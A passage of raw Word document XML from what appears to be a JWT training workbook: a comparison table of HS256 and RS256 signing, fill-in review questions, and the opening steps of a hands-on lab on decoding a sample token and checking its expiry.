              <w:bottom w:val="single" w:color="999999" w:sz="4"/>
              <w:right w:val="single" w:color="999999" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="1A4C80" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">HS256 — Symmetric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="4"/>
              <w:left w:val="single" w:color="999999" w:sz="4"/>
              <w:bottom w:val="single" w:color="999999" w:sz="4"/>
              <w:right w:val="single" w:color="999999" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="2D6A2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">RS256 — Asymmetric</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">One secret key for signing AND verifying</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Private key signs. Public key verifies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Secret must be shared with all verifying services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="472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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Public key can be distributed freely and safely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">If key leaks anywhere, tokens can be forged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Leaking public key is harmless</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Simpler to set up</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="472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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">More complex setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Good for: single server, internal apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Good for: microservices, third-party APIs, OAuth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerable to brute-force if weak secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="472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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="005C3D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">No shared secret to brute-force</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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">HS256 uses ___ key(s). RS256 uses ___ key(s).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The public key in RS256 can / cannot (circle) be shared because:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pP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Borders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="005040" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="34"/>
                <w:szCs w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">Interactive Lab — Hands-On JWT Practice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5040" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="240"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="240"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">  🧪  Open Module 11 in the app. Complete all exercises below independently.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Exercises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Module 11 (the JWT Playground) in the app to complete each exercise. Write your findings below.</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3640"/>
        <w:gridCol w:w="2840"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Step-by-Step Instructions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2840"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">What to Notice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0066CC"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Decode the Sample Token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3640"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Click  📋 Load Sample</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Click  🔍 Decode Token</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Read the decoded output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2840"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">What are the userId, role, and expiry values?</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b/>
                <w:bCs/>
                <w:color w:val="0066CC"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Check the Expiry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Look at the 'exp' value in the output</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
